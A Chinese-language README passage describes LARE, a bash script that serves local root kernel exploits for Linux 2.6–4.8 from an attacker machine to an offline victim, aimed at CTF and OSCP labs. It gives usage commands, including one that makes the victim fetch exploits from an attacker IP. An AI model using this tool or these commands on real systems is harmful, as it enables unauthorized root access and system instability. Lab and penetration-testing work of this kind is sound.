[L]ocal [A]uto [R]oot [E]xploiter 是一个简单的 bash 脚本,当受害机器没有互联网连接时,它可以帮助你从攻击机器上部署本地 root 漏洞利用程序。
该脚本适用于受害机器没有互联网连接的场景(例如,当你 pivoting 到内部网络或参加使用 VPN 连接其封闭实验室的 CTF 时,比如 hackthebox.gr,甚至在 OSCP 实验室中)。 该脚本使用针对 Linux 内核 2.6-4.8 的本地 root 漏洞利用程序。
该脚本灵感来源于 Nilotpal Biswas 的 Auto Root Exploit Tool
bash LARE.sh -a or ./LARE.sh -a
完成后,你需要通过任何方式(wget、ftp、curl 等)将脚本复制到受害机器,并使用以下命令在本地运行 Exploiter:
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
该脚本会在机器上运行多个内核漏洞利用程序,可能导致系统不稳定。强烈建议将其作为最后手段,并在非生产环境中使用。